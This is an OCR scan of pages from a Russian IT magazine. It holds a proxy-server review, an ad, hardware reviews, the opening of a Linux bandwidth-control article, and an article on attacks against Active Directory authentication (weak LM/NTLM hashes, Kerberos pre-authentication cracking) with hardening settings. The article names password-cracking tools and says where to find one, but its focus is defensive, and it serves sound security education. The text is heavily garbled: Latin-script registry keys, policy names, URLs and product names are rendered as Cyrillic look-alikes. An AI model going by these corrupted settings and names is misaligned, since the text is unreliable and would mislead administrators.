токолов, указав протокол, направление действия и расписание. 

Функциональность: 6/10 

Удобство управления : 8/10 

Работа с пользователями: 5/10 

Мониторинг и статистические отчеты: 6/10 

ѴУІЫРКОХѴ 1.5.3 

РАЗРАБОТЧИК: І.АМ-РРШЕКТ 

ѴѴЕВ: ѴѴѴѴѴѴ.ѴѴІ N РКОХѴ. N ЕТ/І N О ЕХРІІ . НТМ I. 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: 80486, 8 МБ ОЗУ 

ОС: ѴШООѴѴ595/98/МЕ/МТ/2000 (ОФИЦИАЛЬНО], РАБОТАЕТ И В 

ѴѴІМООѴѴ5ХР/2003 

В отличие от остальных продуктов, поддерживающих МАТ, ѴѴіпРгоху 
— классический прокси-сервер. При его использовании пользовате- 
ли должны настроить приложения для выхода через промежуточный 
узел, в качестве сервера указав адрес системы с ѴѴіпРгоху и порт (по 
умолчанию 3128). Можно сказать, это единственная настройка, ко- 
торую предстоит выполнить. Поддерживается работа с НТТР, НТТР5, 
РТР, Теіпеі, ЫМГР, 5МТР/РОРЗ (по умолчанию отключен), КеаІАисІіо, 
СОРНЕК и 50СК5. При этом ѴѴіпРгоху может быть не только шлюзом 
5МТР/РОРЗ, но и почтовым сервером, умеющим отправлять, соби- 
ратьирассортировыватьпочтуснесколькихРОРЗ-ящиков. Необходи- 
мое переключение и настройки производятся в меню Маіі. Функция 
Рои Марріп§ позволяет перенаправлять соединения к удаленным 
портам, поэтому можно без проблем настроить подключение к 
ІС(2, ІКС и другим сервисам. Возможность кэширования НТТР, РТР 
и СОРНЕК трафика дает возможность снизить нагрузку на канал. 
Предусмотрен вызов по требованию для біаі-ир (РРРоЕ, модем и 
т.п.) подключений. Возможно каскадирование прокси-серверов. 
ѴѴіпРгоху поддерживает до 900 пользователей, которые могут 
входить в 100 групп. Доступ реализован посредством ввода логи- 
на и пароля. Управление настройками производится при помощи 
браузера, для чего следует подключиться к 3129 порту. В целях бе- 
зопасности можно указать сетевые адреса, с которых разрешено 
управление. 

Функциональность: 6/10 

Удобство управления : 7/10 

Работа с пользователями: 5/10 

Мониторинг и статистические отчеты: 5/10 

ЗА КЛ Ю Ч Е Н И Е Доступные решения очень сильно отличаются фун- 
кционально (и, конечно, ценой), поэтому следует присмотреться к 
ним и выбрать наиболее подходящий продукт под конкретные усло- 
вия и задачи. Среди лидеров можно выделить ІізегСаііе — единствен- 
ный из обзора, умеющий проверять трафик антивирусом, причем 
сразу двумя. Он будет полезен также в том случае, если понадобится 
5ІР-сервер для внутренних переговоров. 1 т 
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АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

ТРПРЙПН ИНТЕРНЕТ 

I Ь Л Ь Ч* V П ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

* Подключение - в любом месте 
Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

• Установка прямого московского телефонного номера 

• Многоканальные телефонные номера 

* ІР-телефония 

* Выделенные линии Интернет 

• Корпоративные частные сети (ѴРІЧ) 

* Хостинг, услуги йаіа-центра 



РМ Телеком 

уѵѵѵѵѵ.гті.ги е-таіКЫо@ттІ,ги (495) 988-8212 

Приглашаем специалистов, имеющих 
опыт работы в области телекоммуникаций 




»ЗѴІЧ/АСК 



» ЗѴЫ/АСК 



СЕРГЕЙ ЯРЕМЧУК 

/ СКШ0ЕП@5ѴЫАСК.К1І / 

Максимальная 
защита АО 

Асііѵе Рігесіогѵ: распространенные виды атак и защита от них 

Служба каталогов Асііѵе Эігесіогу обладает многими преимущества- 
ми. Это и централ изованное управление учетным и записями и досту- 
пом к ресурсам, и групповые политики, позволяющие развертывать 
ПО на множестве компьютеров и более гибко производить настройки, 
аудит объектов и многое другое. Инфраструктура Ай — ключевой эле- 
мент сетей, построенных на базе ѴѴіпбоѵѵз. К ее защите следует при- 
ложить максимум усилий. 



Контроллеры домена содержат все необходи- 
мые данные, используемые для аутентифика- 
ции в домене. В случае их отказа работать не 
сможет ни один из пользователей. Компроме- 
тация учетных данных имеет не менее пагуб- 
ные последствия: пользователь, обладающий 
определенными правами, может нанести 
серьезный вред системе или получить доступ к 
конфиденциальной информации. Именно по- 
этому их защите, сохранности и целостности 
необходимо уделять повышенное внимание. 
Рекомендуется планировать все мероприятия 
с самых первых шагов — начиная от физичес- 
кой безопасности сервера, ограничения к нему 
доступа, определения задач для администра- 
торов и заканчивая планом резервного копи- 
рования и восстановления работоспособности 
контроллера домена или отдельных учетных 
записей, удаленных случайно или умышленно. 
Придется разобрать достаточно много вопро- 
сов и произвести не один десяток настроек для 
того, чтобы служба каталогов и контроллер 
домена были в безопасности. Каких именно? 
Читай дальше. 

ПОДБОР ХЭШ-ФУНКЦИИ ПАРОЛЯ В сегод- 
няшних сетях зачастую можно встретить ра- 
боту нескольких поколений ѴѴіпсіоѵѵз, и адми- 
нистратору в целях совместимости приходится 
принудительно активировать системные пара- 
метры, обозначенные как «не рекомендуемые». 
Многие дыры живут в ѴѴіпсІоѵѵз еще со времен 
95/ОТ, благополучно перекочевывая из релиза 



в релиз, и все для того, чтобы системы мирно 
сосуществовали друг с другом (плюс, чтобы на- 
чинающий админ мог поднять сеть за несколь- 
ко кликов мышки) . Хотя нужно признать, что в 
новых системах, чтобы вернуть совместимость 
(а значит, получить в подарок весь груз уязви- 
мостей), необходимо выполнить некоторые 
действия, осознавая, к каким неприятностям 
это может привести. 

Протоколом сетевой аутентификации в ОТ 
является ОТЪМ (ОТ ЬАИ Мапа§ег; чуть позже 
его стали называть ОТЪМѵІ) . Он изначально 
поддерживается в сетях ѴѴіпсІоѵѵз 2к/ХР/2кЗ, а 
после активации соответствующей политики 

— ив более новых системах. Основой ОТЪМ 
послужил архаичный протокол аутенти- 
фикации Місгозой: ЬАЫ Мапа^ег, с которым 
сохранена совместимость. В итоге, введенный 
пользователем пароль хранится в двух хэшах 

— ЬМ и ОТ. При этом ОТ-хэш является, по 
сути, М04-хэшем пароля, поддерживает все 
символы Шісосіе и длину пароля вплоть до 256 
символов. С ЬМ, которому уже более 20 лет, 
ситуация куда прозаичнее. У него два больших 
недостатка. Первый — пароль разбивается 

на две части, каждая по 7 символов, которые 
и шифруются по отдельности (максималь- 
ная длина пароля равна 14 символов) . Если 
символов в пароле меньше, оставшееся место 
дополняется нулями. Нужно ли говорить, что 
намного легче подобрать 2 хэша по 7 знаков, 
чем один на 14? Тем более, угадав часть паро- 
ля, нередко можно сделать вывод по осталь- 



ным символам. Второй недостаток — ЬМ-хэш 
регистронезависим, так как все символы 
перед шифрованием приводятся к верхнему 
регистру. То есть, раззшжі и РА55ѴЮВХ) для 
ЬМ — один и тот же пароль. Это еще больше 
упрощает подбор. При аутентификации вмес- 
то самих хэшей передаются хэши хэшей, и что 
самое интересное, по умолчанию при ответе 
по сети передаются оба варианта (ЬМ и ОТ) . 
Программы перебора паролей используют те 
же алгоритмы, что и ОС, хэшируя комбинацию 
и отправляя ее серверу. Теоретически, процесс 
полного перебора (брутфорса) может зани- 
мать довольно много времени, но если система 
будет использовать ЬМ-хэш, задача становится 
тривиальной. 

Некоторые клиентские программы могут без 
участия пользователя произвести ОТЪМ-аутен- 
тификацию при условии, что ее поддерживает 
сервер. Поэтому хэш можно получить даже 
при помощи Іеіпеі, просто подключившись к 
нужному порту. Программы, позволяющие по- 
добрать пароли, имеются в свободном доступе 
— ЭоЬп іЬе Кіррег (\ѵтѵ.ореп\ѵа11.сот/іоЬп) , 
ЬСР (ѵѵѵѵѵѵ.1ср50Іі:.сот/ги55Іап) и ЬОрІнСгаск 
ЬС5. Последнюю в открытом доступе найти 
нельзя; после приобретения Азщке компанией 
Зутащес она исчезла с сайта, но достаточно 
ввести в гугле «ЬС5 боѵтіоасі», и ты найдешь 
нужный файл. Например, ЬСР может сама за- 
хватывать передаваемые по сети пакеты, или 
импортировать учетные записи с локального 
и удаленного компьютера, выполнять импорт 
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файлов 5АМ, ЗпііТ и созданных другими 
утилитами (ЬС, ЬС5 и РѵѵБитр) . Реализовано 
три типа атак для подбора паролей по хэшам: 
атака по словарю, гибридная атака по словарю 
и Ъпле Іогсе. 

Именно по этим причинам на смену про- 
токолу сетевой аутентификации ИТЬМѵІ 
пришел ШЪМѵ2. Новая реализация во многом 
похожа на своего предшественника, но хэш 
образует более устойчивый к взлому алго- 
ритм НМАС-МБ5, а при запросе используется 
128-разрядный ключ. Чтобы сделать невоз- 
можными некоторые атаки, где проигрыва- 
ются ранее записанные учетные данные, в 
ШЪМѵ2 введена метка времени. В доменной 
среде ШЪМѵ2 применяется вместо КегЬегоз 
в ситуациях: аутентификация по ІР-адресу, в 
рабочей группе, если клиент не принадлежит 
домену или текущему лесу (в том случае если 
не установлено доверительное отношение), и 
при невозможности использования КегЪегоз 
(например, блокировка йгеѵѵаіі) . Есть еще 
варианты, но о них чуть дальше. 

Запретить хранение ЬМ-хэшей в ѴѴіпсіоѵѵз 2к/ 
ХР/2кЗ довольно просто: для этого необхо- 
димо добавить в реестр параметр НоЬМНазЬ 
типа БѴГОІШ в раздел НКЬМ\5У5ТЕМ\ 
Сиггепі:Сопі:гоІ5еі:\Сопі:го1\Е5а со значением 1 
(подробнее о запрещении хранения ЬМ-хэшей 
можно прочитать в статье КВ299656) . Кстати, 



если длина пароля более 15 символов, то 
сохраненный ЬМ-хэш нельзя использовать для 
аутентификации, а значит, он непригоден и 
для взлома. 

Параметр типа БЖЖБ ЬМСотраі:іЬі1ігуЕеѵе1 
в этом же разделе позволяет разрешить ЬМ- 
аутентификацию только по запросу сервера 
или вообще запретить. Здесь указывается одно 
из 6 значений: 

0 (по умолчанию) — использовать ЬМ- и 
ЫТ- ответы, ЖЪМѵ2 отключен 

1 — использовать при необходимости 
ЫТЬМѵ2 

2 — только ІМТ-ответ 

3 — только ]МТЬМѵ2 

4 — отказывать контроллеру домена в 
ЬМ- аутентификации 

5 — отказывать контроллеру домена 
в ЬМ- и №Г- аутентификации, только 
ЫТЬМѵ2 

В доменной среде проще воспользоваться 
возможностями групповой политики (Сгоир 
Роіісу ОЪдесО, выбрав в редакторе СРО пункт 
«Параметры безопасности» по маршруту 
«Конфигурация компьютера Конфигурация 
ѴѴіпбоАлге Параметры безопасности Ло- 
кальные политики» и активировав политику 
«НеМ/ѵогк зесигйу: Бо пои 5Шге ЬАМ Мапа^ег 



ЬазЬ ѵаіие оп пехі: раззѵѵогсі сЬап^е» (не хранить 
хэш-значения ЬАЫ Мапа^ег при следующей 
смене пароля) . Начиная с Ѵізіа, она действует 
по умолчанию. Политика «НеМлгогк Зесигпу: 
ЬАН Мапа^ег аинЬепнісаніоп Іеѵеі» определяет 
настройки ШЪМ; установив ее в «ШЪМ2 
гезропзез опіу», можно запретить использова- 
ние ЬМ и ШЪМѵІ. 

В Ѵізііа и выше ЬМ-хэши и ШЪМѵІ также под- 
держиваются, параметр ЕтСотрагіЪіІПуЕеѵеІ 
установлен в 3, — то есть, по умолчанию для 
недоменной аутентификации используется 
ШЪМѵ2. Использование ШЪМ в доменной 
среде определяет политика «№і:ѵ\гогк Зесигііу: 
Яезйгісі ШЪМ: ОТЬМ атЬепйсайоп Сог гіііз 
ботаіп». По умолчанию в ѴѴіп2к8К2 она 
не установлена. Если в сети нет клиентов с 
устаревшими системами, ее можно пере- 
ключить в «Пепу аіі», полностью запретив 
использование этого протокола. Как вариант, 
при помощи этого параметра можно запре- 
тить ШЪМ при доступе к серверу домена или 
учетной записи. 

ЗАЩИТА УЧЕТНЫХ ЗАПИСЕЙ Теперь, когда 
ты все знаешь об особенностях аутентифика- 
ции пользователя в АБ, разберем, как можно 
усложнить жизнь потенциальному взломщику. 
Некоторые советы тебе, возможно, покажутся 
банальными, но опыт показывает, что при- 
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ВѴѴІЫ2К86Р0 П0УМ0ЛЧАНИЮЗАПРЕЩА- 
ЕТХРАНЕНИЕ І.М-ХЭШЕЙ 




ПРОГРАММЫ ВРОДЕ ЬС5 ПОЗВОЛЯЮТ ВОССТАНОВИТЬ ПА- 
РОЛЬ ПО ПЕРЕХВАЧЕННОМУ ЬМ/ЫТ-ХЭШУ 



■“кГЬті 



ІНТТР://ѴѴѴШІ 



Т 

> Ііпкз 



• Статья «ИЛМз 
ііте Ьаз раззесі» на 
Ыодз.ІесЬпеЕсопп/ 
аиіНепІісаііоп . 



• Программа ЗоЬп 
іЬе Кіррег — ѵѵѵѵѵѵ. 
орепѵѵаЦ.сопп/]оЬп . 

• Программа ЮР 

— ѵѵѵѵѵѵ. Іс рзоіЕ сот/ 
гиззіап . 



• Веб-интерфейс 
к АР, написанный на 
РНР: рбрасІѵіеѵѵ.ѵѵеЬ. 
епѵіопзойѵѵаге.сопп . 




> іпіо 

Многие дыры живут 
в ѴѴіпсІоѵѵз еще со 
времен 95/ІЧТ, благо- 
получно перекочевы- 
вая из релиза 
в релиз, и все для 
того, чтобы системы 
мирно сосуществова- 
ли друге другом. 



держиваются их далеко не все. В первую очередь следует 
изменить установленный по умолчанию логин админис- 
тратора домена: «Конфигурация компьютера Парамет- 
ры ѴѴіпсІоѵѵз -> Параметры безопасности -> Локальные 
политики -> Параметры безопасности Учетные записи: 
Переименование учетной записи администратора» или во 
вкладке «Ассіѵе ЭігесПэгу -> Пользователи и компьютеры». То 
же самое проделываем и с гостевой учетной записью (если 
таковая используется, по умолчанию она отключена). Пос- 
ле этого не забываем отслеживать попытки использования 
этих логинов в программах аудита и, обнаружив неладное, 
бьем тревогу. Нападающему в этом случае придется пройти 
полный путь, то есть — подбирать и логин, и пароль. Кроме 
того, у админа появится больше информации для блокиров- 
ки таких попыток. Пароль должен быть достаточно слож- 
ным, сочетать в себе буквы (в разных регистрах), цифры, а 
также спецсимволы. 

Часто нападающий при поиске объекта для атаки ориен- 
тируется на описание учетной записи. Поэтому следует 
удалить или изменить описание админскихучеток, чтобы 
усложнить ему поиск. Взамен — создаем несколько ложных 
учетных записей с описанием «Администратор», но без 
каких-либо прав и контролируем попытки доступа к ним. 
Кардинальным решением является отключение учетной 
записи администратора. Это можно сделать при помощи 
СРО-политики «Учетные записи: Состояние учетной 
записи администратора»; тем более что она автоматически 
включается при запуске системы в безопасном режиме. 
Учитывая важность учетной записи администратора, ее 
нужно использовать только при первоначальных настрой- 
ках. Хорошим вариантом будет создание двух дополнитель- 
ных учеток: для выполнения задач администрирования 
и для повседневной работы (веб-серфинг, почта, аська, 
ведение документации и т.д.) 

По умолчанию в гостевом аккаунте пароль не используется 
— это также может стать проблемой. Поэтому обязательно 
устанавливаем его. Все, кому будет нужен гостевой вход, 
смогут получить эту информацию у админа. 

Часто почтовый адрес пользователя совпадает с его логи- 
ном — и может быть использован при попытке взлома. 
Злоумышленнику собрать базу таких логинов очень 
просто. Достаточно произвести БНА-атаку (Бшесгогу 
Нагѵезі: Анаск) при помощи специальной программы. 




В ЦЕЛЯХ БЕЗОПАСНОСТИ МОЖНО ОТКЛЮ- 
ЧИТЬУЧЕТНУЮ ЗАПИСЬ АДМИНИСТРАТО- 
РА 



генерирующей набор е-таіі адресов и отправляющей на 
них проверочные сообщения. Если 5МТР-сервер подтверж- 
дает прием сообщения для такого адреса (250 Кесіріепі: 

ОК), то он считается действующим. Многие почтовые 
серверы имеют функции, обеспечивающие защиту от ПЫА- 
атаки. Например, в ЕхсЬап^е Зегѵег есть параметр «5МТР 
Тагрішп§» для установки случайного времени задержки 
при ответе на команду КСРТ ТО во время 5МТР-запроса. 

Это затрудняет сбор действующих адресов с домена. 

ПРОБЛЕМЫ КЕКВЕК05 Несмотря на то, что на сегодня 
КегЬегоз признан самый безопасным механизмом аутенти- 
фикации, его реализации далеко не безгрешны. Так, версия 
КегЬегоз в ѴѴіп2к позволяла устроить ЕГОР-шторм в сети, 
поскольку сервер отвечал на любые ЕГОР-пакеты, направ- 
ленные в 464 порт (КегЬегоз). Кроме этого, возможно было 
вызвать переполнение стека при некоторых запросах. 
Чтобы системы от ѴѴіп2кЗ и ниже для пересылки пакетов 
КегЬегоз вместо ЕГОР использовали ТСР, следует установить 
параметр реестра МахРаскеііЗіге в значение 1 (ЭѴѴОКН) . 

Он находится в разделе НКЕМ\5узЩт\Сиггепі:Сопі:гоІ5еі:\ 
Сопі:го1\Е5а\КегЬего5\Рагатеі:ег5. 

Еще одна проблема связана с тем, что если пользователь 
является членом нескольких групп, или атрибут зісіНізіюгу, 
показывающий миграцию пользователя в домене, имеет 
большой размер, то билет (Тіскеі: Сгапгіп^ Тіскеи, ТОТ) 
может превысить установленный по умолчанию лимит в 
12000 бит. Попытка аутентификации при помощи КегЬегоз 
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ВИТЬ АЛГОРИТМЫ ШИФРОВАНИЯ КЕРВЕР05 




6Р0 ПОЗВОЛЯЕТ УПРАВЛЯТЬ ИСПОЛЬЗОВАНИЕМ 
ЬМ/ЫТ-ХЭШЕЙ В ДОМЕНЕ 







ПЕРЕИМЕНОВАВУЧЕТНУЮ ЗАПИСЬ АДМИ- 
НА, ТЫ УСЛОЖНИШЬ ЖИЗНЬ ВЗЛОМЩИКУ 



закончится неудачей, и вместо него будет задействован 
ШЪМ. Причем, последняя ошибка характерна не только 
для ѴѴіп2кЗ и предыдущих версий, как это описано на 
странице зиррогЕтісгозоііі.сот/кЪ /327825. но появляется 
при некоторых условиях и в ѴѴіп2к8. Недостаточный и 
фиксированный размер билета дает возможность прове- 
дения ЭОЗ-атаки, результатом которой является отказ в 
регистрации пользователя с учетными правами админис- 
тратора. Правда, для такой атаки необходимо иметь права 
по управлению группами. 

Чтобы избежать подобной ситуации, увеличь размер токе- 
на, установив максимальное значение 65535 для парамет- 
ра реестра МахТокепЗіге (КЕС_Э\ѴОРХ>), или используй 
формулу для расчета, описанную в бюллетене КВ327825. 
Также следует удалить зісІНізШгу, чтобы освободить место 
в билете. Это можно проделать при помощи ѴВ5 скрипта, 
взятого с зиррогЦтісгозоІЦсот/кЬ/295758 . 

В КегЪегоз версии 5.0, на основе которого построен 
КегЪегоз в ѴѴіпсІоѵѵз от 2к, для получения билета исполь- 
зуется механизм предварительной аутентификации 
(рге-аілЬепгісайоп) . В ходе него клиент отсылает на сервер: 
логин, домен и отметку времени, зашифрованные посредс- 
твом секретного ключа, который создан на основе пароля. 
Знание метки времени позволяет программе КегЬСгаск 



(КегЪегоз Раззшогсі Сгаск, пЩесигПѵ.пи/шоІЪох/кегЪсгасЮ 

расшифровать данные для входа. Сам КегЬСгаск может 
запускаться во всех ОС ѴѴіпсІоѵѵз на ядре Щ, включая Ѵізга, 
и состоит из двух программ: снифера и расшифровщика. 

В реализациях КегЪегоз до ѴѴіп2кЗ включительно для 
шифрования используются алгоритмы СРС-32, МЭ4, 

МЭ5 и БЕЗ. Начиная с Ѵізга, в этом списке появился 
более надежный АЕ5 128/256. Это сделало применение 
КегЬСгаск неэффективным. Если для аутентификации 
применяются смарт-карты, то в сеансе предварительной 
аутентификации для шифрования используется закрытый 
ключ пользователя. Поэтому, чтобы избежать перехвата, 
такой метод регистрации предпочтителен. Как вариант, 
можно зашифровать трафик при помощи ѴРИ, например, 
ІРзес. И, наконец, использовав политику «Ыеі:ѵ\гогк Зесигііу : 
Сопй^иге епсгургіоп іурез аііоѵѵесі Іог КегЪегоз», можно 
жестко установить используемые КегЬегоз алгоритмы 
шифрования и запретить устаревший ЭЕЗ. 

Следует добавить, что в ѴѴіп2к8 появился новый параметр 
«АПоѵѵ СгурШ§гарЬу а1§огпЪтз сотрагіЫе ѵ\шЬ ѴѴіпсіоѵѵз ЬГГ 
4.0». По умолчанию он не установлен — «N 01 : Сопй^игесі», 
а значит, все клиенты, не поддерживающие новые и более 
защищенные алгоритмы, не смогут подсоединиться к 
домену. Если при подключении к ѴѴіп2к8 -домену появля- 
ются ошибки, описанные в КВ942564 Г ^о.тісгозоК.сот/ 
ЕууНпк/?Ыпк1с1 = 104751) . то включи этот параметр. Правда, 
цена такого шага — снижение безопасности. В крайнем 
случае, в ѴѴіп2к8 в свойствах отдельной учетной записи, во 
вкладке Ассоипі:, можно разрешить использование ЭЕЗ/ 
АЕЗ и отключить предварительную аутентификацию. 

Здесь же находится параметр «Зтагі: Сагб Із Редиігесі Іог 
Ішегасніѵе Ъо^оп», установка которого требует использо- 
вания смарт-карты при входе. По умолчанию эта политика 
отключена. 

ЗАКЛЮЧЕНИЕ Атаки, позволяющие перехватить и рас- 
шифровать пароль, в новых версиях системы практически 
сведены на нет. Только в том случае, когда в сети присутс- 
твуют клиенты, работающие под управлением старых вер- 
сий ѴѴіпсіоѵѵз или других ОС, не поддерживающих новые 
параметры протокола, существует вероятность перехвата 
пароля, □с 




> іпіо 

• По умолчанию 

в системах от Ѵізіа 
и выше для недо- 
менной аутентифи- 
кации используется 
[\ІТІ_Мѵ2. 

• Чтобы І\ІТІ_Мѵ2 
могли использовать 
клиенты ѴѴіп98, на 
них следует устано- 
вить специальный 
Оігесіогу Зегѵісе 
СІіепП 

• При правильных на- 
стройках и постоян- 
ном аудите происхо- 
дящих событий риск 
нарушения работос- 
пособности АО можно 
свести к минимуму. 
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Технические характеристики 
НР РгоЫапІ 01.180 65 

> Процессор (один из): 

ІпіеІХеоп 15410-15420 (2,33-2,50 ГГц, 1333 
МГц Р5В, 1 2 Мб 12, 50 Вт) 

ІпіеІХеоп Е5405-Е5450 (2,00-3,00 ГГц, 1333 
МГц Р5В, 12 Мб 12,80 Вт) 

ІпіеІХеоп Е5205 (1,86 ГГц, 1066 МГц Р5В, 6 
Мб 12, 65 Вт] 

> Чипсет: 

Іпіеі 5100 

> Память: 

1 Гб РС2-5300 ОІММ (О ОР2-667] , максималь- 
но 16 Гб (все го 6 слотов ОІММ] 

> Жесткие диски: 

До 1 2 дисков І_РР 5А5 1 5К грт 1 Тб и 
300/147/72 Гб 

До 1 2 дисков І_РР 5АТА 7,2Кгрт1Тби 



750/500/250/160 Гб 

> Поддержка РАШ: 

Встроенный 5АТА РАЮ контроллер с под- 
держкой РАЮ 0,1 

> Сетевой интерфейс: 

Гигабитный сетевой контроллер ІМС105І 
РСІ-Е (встроенный] с поддержкой ѴѴОІ_ и РХЕ 

> Питание: 

750 Вт— стандартная комплешация (поддержива- 
ется «горячая»замена и автопереключение]; 1200 
Вт — высокоэффективный блокпитания 12 В пе- 
рем/тока (с горячей заменой, автопереключение; 
дополнительно]; 750 Вт— блокпитания (резерв- 
ный, с«горячей»заменой, автопереключение; 
дополнительно); 1200 Вт— высокоэффективный 
блокпитания (резервный, с«горячей»заменой, 
автопереключение] С5СІ 2007/2008 (дополни- 
тельно] 



> Расширение: 

1 слот РСІ-Е х8 

2 слота РСІ-Е х4 

> Внешние порты ввода-вывода: 

1 порт Р 3 -45 (ЕГЬегпеГ) (плюс 1 дополнитель- 
ный для дистанционного управления НР 
РгоЫаШ ЫдЫз ОиІ 100с] 

1 последовательный порт 

2 Р5/2 для подключения мыши и клавиатуры 
1 выход ѴСА 

7 портов ИСВ (2 спереди, 4 сзади и 1 внутри] 

> Функции управления: 

Опциональный модуль НР РП0065 ЫдЫз- 
ОиІ 1 00с 

> Другое: 

Оптический 0\Ю-Р0М приводили ОѴО-РѴѴ 
привод НР 50т 

Графический адаптер 32 Мб (поддерживае- 
мое разрешение 1 600x1200x1 6М) 

> Исполнение: 

Стойка 211 (44,80 х 69,88 х 8,75 см] 

Вес: 1 3,06 кг 

> Гарантийное обслуживание: 

Гарантия сроком 1 год на комплектующие, 



Серверы РгоІіаШ от компании НР в представ- 
лении не нуждаются. Надежность, качество и 
доступность сделали серверы этого модельного 
ряда №1 в России. Сегодня мы ознакомимся с од- 
ним из них — НР Ргоііат ОЫ80 С5 . 

Сервер предназначен для применения в сфере 
малого и среднего бизнеса и может выполнять 
широкий спектр задач, отподдержки веб-сервера 
или компонентов поисковой системы до выпол- 
нения функций узла в распределенной вычис- 
лительной сети. Привлекательная цена, безуп- 
речная конструкция с высокой плотностью (211) 
для разных вариантов монтажа в стойке, высокая 
производительность и поддержка до 12 жестких 
дисков (суммарной емкостью 9 Гб) обеспечива- 
ют БЫвО С5 одно из первых мест среди кандида- 
тов для решения задач, связанных с обработкой и 
хранением больших объемов информации. 



Конфигурация сервера очень гибка. В список 
поддерживаемых процессоров входят 7 моде- 
лей 4-ядерных ІшеІХеоп линейки 5400 и один 2- 
ядерный ІшеІХеоп линейки 5200. Объем памяти 
варьируется от 1 до 16 гигабайт ШЖ2-667. Среди 
доступных слотов расширения: один низкопро- 
фильный слот РСІ-Е х8 и два полноразмерных 
слота РСІ-Е х4. 

Сервер поставляется в трех вариантах, отли- 
чающихся встроенным КАГО-контроллером. 
Вариант с интегрированным в южный мост 
контроллером НР ЕтЪеббеб 5АТА КАШ поз- 
воляет подключать до 4 жестких дисков 5АТА 
с возможностью объединения в КАГО-массив 
уровней 0 и 1, без функции «горячей замены». 
Второй вариант оснащен контроллером Зтагі: 
Аггау Е200 и позволяет подключать до 8 жес- 
тких дисков 5АТА/5А5 с функцией «горячей 



замены». Третий вариант — контроллер Р400 
5 таг! Аггау, 12 дисков 5АТА/5А5 с функцией 
«горячей замены». 

Опционально на сервер может быть установлен 
модуль управления НР РЫ00С5 Ы&Ьщ-ОиГ 100с, 
обеспечивающий такие независимые от ОС 
функции удаленного управления, как виртуаль- 
ное управление питанием, доступ к журналу со- 
бытий, сведения о работоспособности системы, 
виртуальные носители для удаленного обновле- 
ния сервера, виртуализация КѴМ и др. И все это 
— в соответствии с ІРМІ 2.0, 5МА5Н-СЬР и воз- 
можностью доступа через браузер или іеіпеі. 
Официально поддерживаемые операционные 
системы: МісгозоКѴѴіпсІоѵѵз 5егѵег2003 К2/2008, 
Кеб Наг Етегргізе Ііпих, 51І5Е Ііпих Етегргізе 
Зегѵег, 5ип Зоіагіз. Рекомендуемая производите- 
лем цена: 44190 рублей. 
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Реро5ку220; 



абсолютно бесшумный тонкий клиент 



Технические характеристики 
Оеро5ку220 

> Процессор: 

ѴІАС7 Есіеп 1 ГГц, безвентиляторный, 
папоВ0А2 

> Чипсет: 

VI А С N 700 

> Память: 

512 Мб ЭЭР2-667, максимальный объем 2 Гб 



> Питание: 

Блок питания на 65 Вт 

> Внешние порты ввода-вывода: 

1 выход Ѵ6А 

4 аудио-выхода (2 на передней панели) 

2 порта Р5/2 

1 порт БАМ (10/1 00 Мбит/сек) 

4 порта 115В (2 на передней панели) 

1 порт СОМ 
1 параллельный порт 



Минимальное энергопотребление 

Полное отсутствие механически подвижных 

компонентов 

> Исполнение: 

Миниатюрный корпус (290x180x68 мм) 

> Гарантия: 

Срок гарантии составляет 1 или 2 года 




> Видео: > Особенности: 

ѴІА СтСЬготе Рго 64 Мб (в составе чипсета) Полностью пассивное охлаждение 



«Доступный, компактный, производительный» 
— лозунг, который как нельзя лучше описывает 
< тонкий клиент 5ку 220 производства отечест- 
> венной компании Беро Сотриіегз. Надежная и 
й производительная платформа, которая одина- 
ково хорошо подойдет для создания терминалов 
в интернет-кафе, компьютерных классах и офи- 
сах, обойдется потенциальным покупателям в 
скромные 4754 рубля. 

Внутри небольшого черного корпуса скрыта 
материнская плата тіпі-ІТХ, построенная на 
базе чипсета СЫ700 от компании ѴІА и нетребо- 
вательного к энергии процессора С7 Есіеп 1 ГГц 
того же производителя. По умолчанию платфор- 
ма оснащена 512 Мб 00112-667 оперативной па- 
мяти, объем которой можно при необходимости 
увеличить до совершенно фантастических для 
тонкого клиента 2 Гб. 



За вывод графики на монитор отвечает интегри- 
рованный в чипсет видеоадаптер ѴІА ШіСЬготе 
Рго с 64 Мб видеопамяти. Он способен выжать 
разрешение до 2048x1536 при 32-битном цве- 
те, обеспечивает ускорение для 2Б- и ЗБ-прило- 
жений при достаточно высокой частоте смены 
кадров, аппаратно декодирует видео МРЕС-4, 
сглаживает и поворачивает изображение. 

На корпусе расположено четыре аудио-выхода, к 
которым можно подключить 8-канальную акус- 
тическую систему. За вывод звука отвечает высо- 
кокачественный кодек ѴІА Ѵіпуі Ні§1і Бейпігіоп 
Аибіо. Южный мост ѴІА ѴТ8237А поддерживает 
подключение 5АТА-устройств и даже создание 
Ѵ-КАІБ массивов (чем, однако, воспользоваться 
не удастся, поскольку производитель предлагает 
предустановку только одного ГОЕ РІазЬ диска ем- 
костью 256 или 1024 Мб) . 



Особого внимания заслуживают уровни шумо- 
выделения и энергопотребления платформы. 
В корпусе нет ни одного подвижного элемента. 
Энергосберегающий процессор оснащен пас- 
сивной системой охлаждения, которой вполне 
достаточно для поддержания температуры на 
приемлемом уровне. Элементы блока питания 
низкой мощности даже не нагреваются, а вместо 
жестких дисков используются РІазЬ-накопите- 
ли. Все это обеспечивает не только абсолютную 
бесшумность платформы, но и весьма скромный 
уровень энергопотребления (производитель за- 
являет о цифрах порядка 5-15 Вт) . 

Модель 5ку 220 поставляется без операционной 
системы и какой-либо дополнительной перифе- 
рии. Срок гарантии составляет 1 или 2 года, на 
выбор покупателя (во втором случае стоимость 
увеличивается всего на 98 рублей) . 
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ЕВГЕНИЙ ЗОБНИН 
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Каждому 
по потоеб 



потреоностям 

Ограничение полосы пропускания на Ьіпих'овом шлюзе 



Разделение, ограничение и управлениетрафиком — актуальная и слож- 
ная задача, которую обычно возлагают на дорогостоящее специальное 
сетевое оборудование. Но решить ее можно и с помощью подсистемы 
Ыпих-ядра Тгаіііс Сопігоі, неуступающей по возможностям Сізсо 105. 



Допустим, существует офис некой компании X, и 
в нем числится около ста сотрудников, каждый из 
которых может выходить в интернет через шлюз. 
Скорость внешнего канала составляет 100 Мбит. 
Системный администратор справился с настрой- 
кой шлюза в силу своих способностей — что и пос- 
читал достаточным для правильного функциони- 
рования сети. К чему это привело? Кувольнению 
недальновидного (или ленивого) админа. 

Со временем большинство сотрудников начали 
жаловаться на «тормоза» интернета, а другие, 
